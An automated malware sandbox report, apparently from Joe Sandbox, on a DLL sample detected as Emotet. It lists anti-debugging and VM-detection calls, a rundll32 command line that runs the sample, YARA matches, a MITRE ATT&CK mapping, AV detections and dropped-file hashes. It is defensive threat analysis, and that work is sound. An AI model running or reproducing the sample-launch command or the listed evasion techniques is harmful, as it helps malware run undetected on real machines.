                      Source: WerFault.exe, 00000016.00000003.689756060.000000000479B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.692127501.00000000047A2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW_
                      Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F250326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6F250326
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F23E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,1_2_6F23E690
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F231290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,1_2_6F231290
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012207D2 mov eax, dword ptr fs:[00000030h]1_2_012207D2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F249990 mov eax, dword ptr fs:[00000030h]1_2_6F249990
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F24EC0B mov ecx, dword ptr fs:[00000030h]1_2_6F24EC0B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F2502CC mov eax, dword ptr fs:[00000030h]1_2_6F2502CC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F249920 mov esi, dword ptr fs:[00000030h]1_2_6F249920
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F249920 mov eax, dword ptr fs:[00000030h]1_2_6F249920
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F249990 mov eax, dword ptr fs:[00000030h]4_2_6F249990
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F24EC0B mov ecx, dword ptr fs:[00000030h]4_2_6F24EC0B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F2502CC mov eax, dword ptr fs:[00000030h]4_2_6F2502CC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F249920 mov esi, dword ptr fs:[00000030h]4_2_6F249920
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F249920 mov eax, dword ptr fs:[00000030h]4_2_6F249920
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA07D2 mov eax, dword ptr fs:[00000030h]7_2_00BA07D2
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012289A2 LdrInitializeThunk,1_2_012289A2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F24A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6F24A462
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F250326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6F250326
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F24AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6F24AB0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F24A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6F24A462
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F250326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6F250326
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F24AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6F24AB0C
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6544 -ip 6544Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 324Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6544 -ip 6544Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 332Jump to behavior
                      Source: loaddll32.exe, 00000001.00000000.663256244.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.662492009.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.638431605.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.641347944.0000000001970000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.742335301.00000000036A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000001.00000000.663256244.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.662492009.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.638431605.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.641347944.0000000001970000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.742335301.00000000036A0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000001.00000000.663256244.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.662492009.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.638431605.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.641347944.0000000001970000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.742335301.00000000036A0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                      Source: loaddll32.exe, 00000001.00000000.663256244.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.662492009.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.638431605.0000000001970000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.641347944.0000000001970000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.742335301.00000000036A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F24A584 cpuid 1_2_6F24A584
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F24A755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_6F24A755
                      Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.2e221e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.1333540.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.713568.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.650000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.713568.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2e221e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.b90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.650000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.1210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.1333540.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3303590.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.1210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.b90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3303590.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.638369835.000000000131B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.638310393.0000000001210000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.634927199.0000000002E0A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.636690720.00000000032EA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.662291713.0000000001210000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.663123528.0000000001210000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.638357953.0000000000650000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.637148475.0000000003200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.693214956.000000000131B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.597595639.0000000003259000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.641147134.000000000131B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.638392292.00000000006FA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.663179674.000000000131B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.662403503.000000000131B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.634790004.0000000000B90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.636271952.0000000003100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.640836289.0000000001210000.00000040.00000010.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API1Path InterceptionProcess Injection12Masquerading2OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerSecurity Software Discovery51SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSVirtualization/Sandbox Evasion3Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemSystem Information Discovery33Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532438 Sample: 3pO1282Kpx.dll Startdate: 02/12/2021 Architecture: WINDOWS Score: 68 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected Emotet 2->46 8 loaddll32.exe 1 2->8         started        10 svchost.exe 3 8 2->10         started        12 svchost.exe 9 1 2->12         started        15 3 other processes 2->15 process3 dnsIp4 17 rundll32.exe 2 8->17         started        20 cmd.exe 1 8->20         started        22 rundll32.exe 8->22         started        28 3 other processes 8->28 24 WerFault.exe 10->24         started        26 WerFault.exe 10->26         started        40 127.0.0.1 unknown unknown 12->40 process5 signatures6 42 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->42 30 rundll32.exe 17->30         started        32 rundll32.exe 20->32         started        34 rundll32.exe 22->34         started        36 rundll32.exe 28->36         started        process7 process8 38 rundll32.exe 32->38         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      3pO1282Kpx.dll23%VirustotalBrowse
                      3pO1282Kpx.dll18%ReversingLabsWin32.Trojan.Phonzy

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      1.0.loaddll32.exe.1210000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      6.2.rundll32.exe.650000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      4.2.rundll32.exe.3200000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.b90000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      1.0.loaddll32.exe.1210000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      5.2.rundll32.exe.3100000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      1.2.loaddll32.exe.1210000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      1.0.loaddll32.exe.1210000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      1.0.loaddll32.exe.1210000.6.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.ver)0%Avira URL Cloudsafe
                      http://www.microsoft.0%URL Reputationsafe
                      http://schemas.xmlso0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.ver)svchost.exe, 0000000A.00000002.744484037.0000020495E12000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://upx.sf.netAmcache.hve.19.drfalse
                        		high
                        http://www.microsoft.WerFault.exe, 00000016.00000003.689793778.00000000047AB000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.689756060.000000000479B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.692147175.00000000047AC000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsosvchost.exe, 0000000A.00000002.742753085.00000204906AF000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious

                        Private

                        IP
                        127.0.0.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:532438
                        Start date:02.12.2021
                        Start time:09:46:35
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 3s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:3pO1282Kpx.dll
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Run name:Run with higher sleep bypass
                        Number of analysed new started processes analysed:27
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal68.troj.evad.winDLL@34/18@0/1
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 15.8% (good quality ratio 14.6%)
                        • Quality average: 73.1%
                        • Quality standard deviation: 27.6%
                        HCA Information:
                        • Successful, ratio: 66%
                        • Number of executed functions: 28
                        • Number of non-executed functions: 173
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                        • Found application associated with file extension: .dll
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.35.236.56, 20.42.73.29, 80.67.82.235, 80.67.82.211
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        09:48:56API Interceptor1x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                        Process:C:\Windows\System32\svchost.exe
                        File Type:MPEG-4 LOAS
                        Category:dropped
                        Size (bytes):1310720
                        Entropy (8bit):0.2486016457556919
                        Encrypted:false
                        SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4j:BJiRdwfu2SRU4j
                        MD5:18B070EFED14C96073A9B936EFE79913
                        SHA1:821E818F84ABA70502A904DB87FC94D6510B820F
                        SHA-256:5DAA0308D33857351BC3D7337291607FAE447F85786CFED7948A1A5D538FE49E
                        SHA-512:EEBE8099FB1AE0AD891A59281E791EA3B783983FE68145E1E655BF4B41FA00327C7328DDFC48E4C1100ED948F7AE15B44A2A6C4F629943C01E6C779025559E70
                        Malicious:false
                        Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                        Process:C:\Windows\System32\svchost.exe
                        File Type:Extensible storage user DataBase, version 0x620, checksum 0x1e63e422, page size 16384, DirtyShutdown, Windows version 10.0
                        Category:dropped
                        Size (bytes):786432
                        Entropy (8bit):0.25071093797838945
                        Encrypted:false
                        SSDEEP:384:s+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:zSB2nSB2RSjlK/+mLesOj1J2
                        MD5:3B35ECABDA4B6946E7118FC8CFE61520
                        SHA1:BF8ABDD5A198CBAF0B7BE0A9C403DC732E3A84F2
                        SHA-256:6CB5F094A3B162EA38B7C1B3E0FC0111B82A44F9BB0D953AE613614A26E0F58E
                        SHA-512:D7CFFF816D976ACF7AF992837F81917EA176DAC20FBCAD523F01E7E30ABB8B00B4FDBB1DF5834FE7AA82362A13FE7D05D802840685A6C274248ED0650DE56F8C
                        Malicious:false
                        Preview: .c."... ................e.f.3...w........................&..........w..80...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..........................................................................................................................................................................................................................................80...y.y.................i.f80...y..........................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16384
                        Entropy (8bit):0.07728180241167973
                        Encrypted:false
                        SSDEEP:3:dPlTEvden4t+j8l/bJdAtiGeltoll3Vkttlmlnl:dYX+j8t4wlG3
                        MD5:092DF1FAA6DB821C33C9BBF01F73FDCF
                        SHA1:35D7F10F684DA4913402E647E3342CD5313BAC76
                        SHA-256:CF3D5794FFC0B16C33F0C77BABDF860EA8930679E0593BA1E4E51D1CD855C0F5
                        SHA-512:46A1EBF84DF5725FBC3D109980AE232725694583CE5FCDD3883FC2F2F4552FD8CCCB7057E39436761DA3D3989684A891EC61AC88B9221CA09EAE766AA08775E3
                        Malicious:false
                        Preview: .1......................................3...w..80...y.......w...............w.......w....:O.....w...................i.f80...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_3fb87a191e6babfe54825d1747bdca62202fdccd_d70d8aa6_0ce3f3fd\Report.wer
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6753133274689476
                        Encrypted:false
                        SSDEEP:96:WmcePpSZqymy9hkoyt7JfHpXIQcQ5c6A2cE2cw33+a+z+HbHg0VG4rmMOyWZAXGD:WBBaHnM28jjIq/u7slS274ItW
                        MD5:EC4AD4206ADB820AA65890173145C0DE
                        SHA1:244049840822C83C1555922E9C079698D2A6A462
                        SHA-256:59D0B88DC3EE09B85F98B87B6F80EF0909857B148E649C5BAA85AF909ACBDA72
                        SHA-512:4412E3FB67648A3A82F605DA9C4101C8788DE89322F7B6214BEF25DE500BCBC5C3CD1F8A99AD395548292950E60722BF74B01ACA3F4CC71568094C5B9AA9CE18
                        Malicious:false
                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.4.0.9.9.6.8.6.6.0.8.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.0.1.b.9.4.e.-.8.6.5.c.-.4.a.4.c.-.8.d.2.e.-.9.9.c.6.e.5.f.6.9.e.b.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.6.f.3.9.f.b.4.-.e.8.5.1.-.4.f.9.2.-.9.c.6.8.-.2.e.f.8.a.f.a.6.b.a.7.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.9.0.-.0.0.0.1.-.0.0.1.7.-.9.a.0.6.-.b.3.a.e.a.4.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_0c442de9\Report.wer
